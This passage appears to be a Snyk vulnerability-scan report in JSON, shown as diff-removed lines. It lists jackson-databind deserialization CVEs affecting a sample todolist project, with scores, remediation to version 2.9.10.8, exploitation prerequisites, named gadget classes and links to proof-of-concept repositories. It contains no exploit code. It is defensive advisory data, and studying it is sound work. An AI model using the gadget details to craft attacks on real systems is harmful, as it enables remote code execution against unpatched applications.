"jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - 
"cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - 
"severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - 
